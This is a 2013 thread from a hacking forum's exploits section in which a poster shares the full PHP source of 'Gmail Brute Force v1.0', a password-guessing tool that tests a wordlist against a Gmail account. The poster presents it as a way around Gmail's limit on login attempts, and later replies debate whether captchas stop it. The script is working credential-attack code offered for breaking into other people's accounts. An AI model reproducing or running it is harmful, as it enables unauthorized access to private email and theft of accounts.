Anti-armenia.ORG - Forumlar - Gmail Brute Force v1.0

Forumlar / Hacking Platform / Exploits & Vulnerabilities / Gmail Brute Force v1.0

Istifadəçi

2013-01-30 00:14 GMT

SkarY

VIP

Mesaj Sayı : 19

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək : SkarY

Yaş : 31

Mesaj :

Lately I'm interested in the subject of Brute Force to emails, the first on my list is Gmail, so I've tried
some applications that perform brute force as Hydra, Brutus, Bruter among others.

Gmail is known that only gives you 5 or 7 attempts to place your passord, then asks that checks through codes. so that
it would make a brute force attack with a dictionary of 5-7 words per day (output something desperate), but still not the end.
so that this problem could be to use cURL http://www.php.net/manual/es/intro.curl.php with which attempts 5 to 7 for testing a password may disappear.

Gmail Brute Force V1.0, created by sec-w.com s3n4t00r makes this possible:

I tested it and it goes well, but as you know not everything is easy, Gmail mails that are protected by the famous security
2 or 3 steps (can not remember XD) <which is or is to send or call you and provide you with a code of (06) digits to a number of
cell to confirm the person's access legitimate>; There are white for this application.

So without further ado I give you the code:

Kod:
<?php

/*

author..............: s3n4t00r
home................: sec-w.com
Toolname............: Gmail Brute Force v1.0
Demonstration ......: http://youtu.be/QdEvoJdENBY

*/
set_time_limit(0);

print_r ("

#---------------------------------------->
# ToolName : Gmail Brute Force v1.0
#
# Programmed : s3n4t00r
#
# Home : Sec-w.com
#---------------------------------------->
\n\n");

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <mail> <list pass>\n";
print "\nExample....: php $argv[0] s3n4t00r@gmail.com pass.txt \n";
die();
}

function sws_gmail($mail,$pass){

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://mail.google.com/mail/feed/atom');
curl_setopt($ch, CURLOPT_USERPWD, $mail.':'.$pass);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 4);
$result = curl_exec($ch);
$returnCode = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);

return $returnCode;
}

list($mail, $list,) = array($argv[1], $argv[2]);

$lists = file($list);

foreach ($lists as $pass){

$gmail = sws_gmail($mail,trim($pass));
echo "[+]Testing -> ".$pass."\n";
if($gmail == '200'){

echo "[+]Password Cracked -> ".$pass;
die("\n");
}
}

die("# Failed");

?>

#Good Luck!

#SkarY

Welcome to my world

Anti-armenia.ORG

Istifadəçi

2013-01-30 01:37 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Works without problems?Are you tried it?The reason i'm asking that as you pointed it as before After few "try"s gmail will fuck hacker's brain with captcha.
this applies to HTTP/HTTPS bruteforcing + to IMAP also.
Yet i tried to create simple bruteforcer (in Autoit) against gmail.But i didn't managed to bypass or somehow "bypass" that captcha.IMHO this tool will not work.
Are you tried it? Your things about it?

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2013-01-30 02:18 GMT

SkarY

VIP

Mesaj Sayı : 19

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək : SkarY

Yaş : 31

Mesaj :

There is a video on the script and if I tried it once but did not find anything ...

Now the script posted the video.

Welcome to my world

Anti-armenia.ORG

Istifadəçi

2013-02-01 11:42 GMT

Frozen

İstifadəçi

Mesaj Sayı : 135

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş :

Mesaj :

ThankZZZZZ

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

Anti-armenia.ORG